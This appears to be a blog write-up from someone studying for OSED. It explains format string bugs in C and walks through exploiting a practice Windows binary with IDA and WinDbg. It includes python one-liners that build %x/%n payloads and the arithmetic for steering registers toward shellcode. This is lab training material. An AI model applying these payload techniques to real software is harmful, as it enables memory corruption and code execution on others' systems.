
Format String Vulnerability


I am continuing to train my skills for the OSED certification. One of the vulnerability classes the course covers for the C and C++ languages is the format string vulnerability.

Understanding the vulnerability #

First Scenario #

If user input is passed directly to printf as the format string, the code is vulnerable to a format string attack.

The code below is a classic example of a format string vulnerability.

char user_input[100];
fgets(user_input, sizeof(user_input), stdin);
printf(user_input);  /* vulnerable: user input is used as the format string */

Second Scenario #

If the number of format string specifiers does not match the number of arguments, the result is unexpected behaviour, such as printing sensitive data from the stack or crashing the program.

The code below is an example: there are 2 format string specifiers but only 1 argument, the user input. The second %s can potentially leak sensitive data, print garbage data, or read an invalid memory address and cause a crash:

printf("Hello pentesthacks, %s and %s", input_user);
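A mismatch like this can be spotted by counting the conversion specifiers in the format string and comparing the result with the number of arguments. The following is a rough sketch of that check, not a full printf parser: the name count_specifiers and the regular expression are my own, and specifiers that use * for width or precision are deliberately ignored.

```python
import re

# Rough pattern for printf-style conversions: flags, width, precision,
# length modifier, conversion character. "%%" is matched so that it can
# be skipped, since it prints a literal percent sign and uses no argument.
SPEC = re.compile(
    r"%(?:%|[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|j|z|t|L)?[diouxXeEfFgGaAcspn])"
)


def count_specifiers(fmt):
    """Return how many arguments the format string appears to consume."""
    return sum(1 for m in SPEC.finditer(fmt) if m.group() != "%%")


fmt = "Hello pentesthacks, %s and %s"
supplied_args = 1  # only input_user is passed in the example above
print(count_specifiers(fmt), "specifiers,", supplied_args, "argument")
```

Here the count is 2 while only 1 argument is supplied, which is exactly the mismatch described above.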

Format String Challenge #


I found a really good challenge for understanding the format string vulnerability concept. If you want to follow along, you can check the original author's post and download Challenge.exe: Exploiting Format strings in Windows.

If you run the program, you can see that it tries to open the file named by its first argument, so we learn that the software expects a filename. Another observation is that it then reads the file and prints both the filename and the file content back to the screen.

We could use two approaches to uncover vulnerabilities. The first is to reverse engineer the software with a disassembler to understand how it works. The second is to fuzz it, with a custom fuzzer or an existing one, feeding it many random inputs in an attempt to crash it. We will take the first approach, using IDA Free.

Reversing with IDA Free #

The vulnerability is the one discussed in the First Scenario: the user input is passed directly to the printf function. You can observe this at the push eax instruction, which pushes the user-controlled data as the format string and so allows the user to manipulate the format string specifiers.

Exploiting the format string vulnerability #

We can experiment with format specifiers to get a sense of the vulnerability. The following format string specifiers are the ones mainly used in this type of vulnerability:

Format String Specifier | Description
%x | Prints the corresponding argument as a hexadecimal number. In the context of a format string attack, each %x displays the next value on the stack in hexadecimal format.
%n | Writes the number of characters printed before the %n to the address given by the corresponding argument.
%s | Reads the corresponding argument as a pointer to a null-terminated array of characters, and printf displays that string.

There are more format string specifiers, such as %d and %p; you can look at the official documentation here.

Let’s go back to the challenge. We can play with it by sending A’s followed by %x format string specifiers. If the software is vulnerable to format string attacks, we should see values from the stack printed in hexadecimal in place of each %x.

.\Challenge.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
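To build some intuition for why each %x leaks another value, here is a toy model in Python. It is only a simplification under my own assumptions, not how the real printf is implemented: the stack is represented as a plain list of 32-bit words, the function name toy_printf and the sample values are made up, and only %x is understood.

```python
def toy_printf(fmt, stack_words):
    """Toy model: every %x consumes the next word from stack_words.

    A real printf reads its variadic arguments from the stack; when no
    arguments were passed, it simply keeps reading whatever is there.
    """
    words = iter(stack_words)
    out = []
    i = 0
    while i < len(fmt):
        if fmt.startswith("%x", i):
            # No more modelled words left: pretend the next word is 0.
            out.append(format(next(words, 0), "x"))
            i += 2
        else:
            out.append(fmt[i])
            i += 1
    return "".join(out)


# Hypothetical stack contents, chosen only for illustration.
fake_stack = [0x14F748, 0xDEADBEEF, 0x41414141]
print(toy_printf("AAAA%x%x%x", fake_stack))
```

In this model the third %x prints 41414141, which mirrors the idea of walking the stack with enough %x specifiers until our own A's show up.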

screenshot:

We use WinDbg to see what is going on.

The payload:

python -c "print('A'*300 + '%x'*161 + '%n')"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n

The screenshot of WinDbg capturing the crash:

By changing the number of %x specifiers and increasing or decreasing the number of A's, we can manipulate eax; we also control ecx. One thing to take into consideration: by increasing the number of %x, we can point the eax value to our shellcode.

python -c "print('A'*300 + '%x'*151 + '%n'+ 'B'*4)"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%nBBBB

Below, we can see that by adjusting (increasing) the number of %x we can control eax.

The idea here is to make eax point to the return address and to control ecx so that it holds the address of our shellcode. Once the function returns, the shellcode will be executed, because the return address will be pointing to our shellcode.

Let's try to control ecx. We first need to find the beginning of our A’s; the address is 0x14f748. We can divide it by 4 in WinDbg and place the resulting decimal value in our payload as a precision, repeated 4 times.

0:000> ? 0x14f748 / 4
Evaluate expression: 343506 = 00053dd2

The specifier %.343506x, repeated 4 times, can be placed as part of the payload:

python -c "print('A'*300 + '%x'*151 + '%.343506x' * 4 + '%n'+ 'B'*4)"
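The reason a precision such as %.343506x is useful is that it forces at least that many characters to be printed, and %n stores the number of characters printed so far. Python's % operator happens to handle precision on %x the same way, so the effect can be sketched as below. Python has no %n, so len() stands in for the count that %n would store; the helper name printed_length and the sample stack words are my own assumptions.

```python
def printed_length(fmt, words):
    """Length of the formatted output, i.e. the count %n would store."""
    return len(fmt % tuple(words))


word = 0x41  # hypothetical value consumed by each specifier

print(printed_length("%x", [word]))         # 2
print(printed_length("%.343506x", [word]))  # 343506

# Four padded specifiers add up to the payload address used above.
total = printed_length("%.343506x" * 4, [word] * 4)
print(total, hex(total))                    # 1374024 0x14f748
```

In the real payload the A's and the plain %x specifiers are printed too, so the count ends up somewhat higher than 0x14f748, which is why the value has to be adjusted afterwards.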

After running the payload again, ecx now points to 0x14fd2c and eax is off from our BBBBs. We can fix eax by increasing the number of %x. For ecx, we subtract the payload address 0x14f748 from 0x14fd2c and add the result to the previously calculated decimal value.

0:000> ? 0x14fd2c - 0x14f748
Evaluate expression: 1508 = 000005e4

0:000> ? 0n343506 + 0n1508
Evaluate expression: 345014 = 000543b6

The fourth value we will use in the payload is 345014. I also adjusted the number of %x to point eax to our ‘B’*4.
Note: the calculation must be done in decimal, and the value in the format string specifier (%.345014x) is always in decimal base.

 python -c "print('A'*300 + '%x'*161 + '%.343506x' * 3 + '%.345014x' + '%n'+ 'B'*4)"

We now see that ecx contains the value 0x150360. We subtract the payload address 0x14f748 from it, and because 0x150360 is the higher number, we then subtract the result from the value previously used in the payload, 345014 (decimal).

Note: the reason we subtract from the previous payload value (“? 0n345014 - 0n3096”) is that the ecx value 0x150360 is higher than the address where our payload sits in memory, 0x14f748.

0:000> ? 0x150360 - 0x14f748
Evaluate expression: 3096 = 00000c18

0:000> ? 0n345014 - 0n3096
Evaluate expression: 341918 = 0005379e
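The same arithmetic can be reproduced outside WinDbg. The snippet below is a small sketch in Python using only the addresses quoted in this post; the names PAYLOAD_ADDR and corrected_width are my own, and the rule it encodes (lower the last precision by however far ecx overshoots the payload address) is simply the correction applied in the step above.

```python
PAYLOAD_ADDR = 0x14F748  # start of our A's, as observed in WinDbg


def corrected_width(current_width, observed_ecx, target=PAYLOAD_ADDR):
    """Shrink the last precision by the amount ecx overshoots the target."""
    return current_width - (observed_ecx - target)


# Same as "? 0x14f748 / 4"
print(PAYLOAD_ADDR // 4)                  # 343506

# Same as "? 0x150360 - 0x14f748"
print(0x150360 - PAYLOAD_ADDR)            # 3096

# Same as "? 0n345014 - 0n3096"
print(corrected_width(345014, 0x150360))  # 341918
```

Python integers print in decimal by default, which matches the requirement that the precision in the format string is written in decimal.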

Running the python command again and feeding the output to the program, we can see that we successfully pointed ecx to our payload address, and eax is pointing to our 0x42424242 (BBBB).

python -c "print('A'*300 + '%x'*161 + '%.343506x' * 3 + '%.341918x' + '%n'+ 'B'*4)"
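Since the payload is tweaked many times during this process, it can be convenient to generate it from a small script instead of editing a one-liner. This is just a sketch of how I would parameterise it; the function name build_payload and its parameter names are hypothetical, and the defaults are the values from the final command above.

```python
def build_payload(pad=300, leaks=161,
                  widths=(343506, 343506, 343506, 341918),
                  tail="B" * 4):
    """Assemble the format string payload.

    pad    -- number of 'A' characters at the start
    leaks  -- number of plain %x specifiers (shifts which stack word is used)
    widths -- decimal precisions for the padded %x specifiers (steer ecx)
    tail   -- bytes placed after %n (the value eax should end up holding)
    """
    padded = "".join(f"%.{w}x" for w in widths)
    return "A" * pad + "%x" * leaks + padded + "%n" + tail


if __name__ == "__main__":
    print(build_payload())
```

Changing a single argument, for example build_payload(leaks=151), then reproduces the earlier experiments without retyping the whole string.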

As a challenge, you can try to move forward: find the bad characters and replace the A's (0x41414141) with an actual payload, such as shellcode that spawns a calculator. You also have to make eax point to the return address.

I hope this will be helpful to somebody trying to understand format string vulnerabilities.

😀 Bye for now.